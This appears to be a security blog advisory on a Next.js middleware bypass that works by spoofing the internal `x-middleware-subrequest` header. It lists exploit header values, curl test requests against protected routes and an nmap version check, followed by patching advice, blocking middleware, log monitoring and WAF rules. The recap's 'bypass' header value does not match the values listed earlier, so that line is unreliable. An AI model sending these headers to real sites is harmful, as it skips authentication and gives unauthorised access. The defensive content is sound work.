Listen to this Post
The Next.js middleware allows you to run code before a request is completed. Based on the incoming request, you can modify the response by rewriting, redirecting, modifying headers, or responding directly.
Vulnerability Details
Next.js uses an internal header `x-middleware-subrequest` to prevent recursive requests from triggering infinite loops. A security vulnerability allows attackers to skip middleware execution, potentially bypassing critical checks like authorization cookie validation before reaching protected routes.
Patched Versions:
- Next.js 15.2.3 or higher
- Next.js 14.2.25 or higher
- Next.js 13.5.9 or higher
Exploitable Headers:
x-middleware-subrequest: middleware x-middleware-subrequest: src/middleware x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
Nuclei Template: GitHub/Nuclei-Templates
You Should Know:
1. Testing the Vulnerability with cURL
curl -H "x-middleware-subrequest: middleware" http://vulnerable-nextjs-site.com/protected-route
If the middleware is bypassed, the protected route may load without authentication.
#### **2. Detecting Vulnerable Next.js Versions**
nmap -sV --script http-headers <target-ip> | grep -i "Next.js"
Check if the version is below the patched releases.
#### **3. Mitigation Steps**
- Update Next.js:
npm update next
- Custom Middleware Validation:
export function middleware(req) { if (req.headers.get('x-middleware-subrequest')) { return new Response('Middleware Bypass Attempt Blocked', { status: 403 }); } // Proceed with auth checks }
#### **4. Logging Suspicious Requests**
<h1>Linux log monitoring</h1> tail -f /var/log/nginx/access.log | grep "x-middleware-subrequest"
#### **5. Using WAF Rules to Block Exploits**
For **NGINX:**
location / {
if ($http_x_middleware_subrequest) {
return 403;
}
}
For **Cloudflare:**
- Create a WAF rule to block requests containing
x-middleware-subrequest.
### **What Undercode Say:**
This vulnerability highlights the importance of proper middleware validation in Next.js applications. Attackers can bypass security checks by manipulating internal headers, leading to unauthorized access. Always:
– Keep frameworks updated.
– Implement strict header validation.
– Monitor logs for unusual headers.
– Use WAF rules for additional protection.
**Relevant Commands Recap:**
<h1>Check Next.js version</h1> npm list next <h1>Test middleware bypass</h1> curl -H "x-middleware-subrequest: bypass" http://target.com/admin <h1>Monitor logs in real-time</h1> grep "x-middleware-subrequest" /var/log/web-traffic.log
**Expected Output:**
A secure Next.js application rejecting malicious `x-middleware-subrequest` headers with a 403 Forbidden response.
**Relevant URLs:**
References:
Reported By: Saurabh B294b21aa – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
